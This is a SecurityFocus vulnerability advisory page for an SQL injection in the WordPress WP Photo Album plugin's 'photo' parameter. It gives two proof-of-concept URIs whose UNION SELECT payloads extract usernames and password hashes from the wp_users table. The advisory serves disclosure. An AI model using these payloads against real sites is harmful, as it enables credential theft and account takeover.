Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/photos/?album=1&photo=-11111+union+select+concat(user_login,char(45),user_pass)+from+wp_users--
http://www.example.com/?page_id=[gallerypage]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users--







 

Privacy Statement
Copyright 2009, SecurityFocus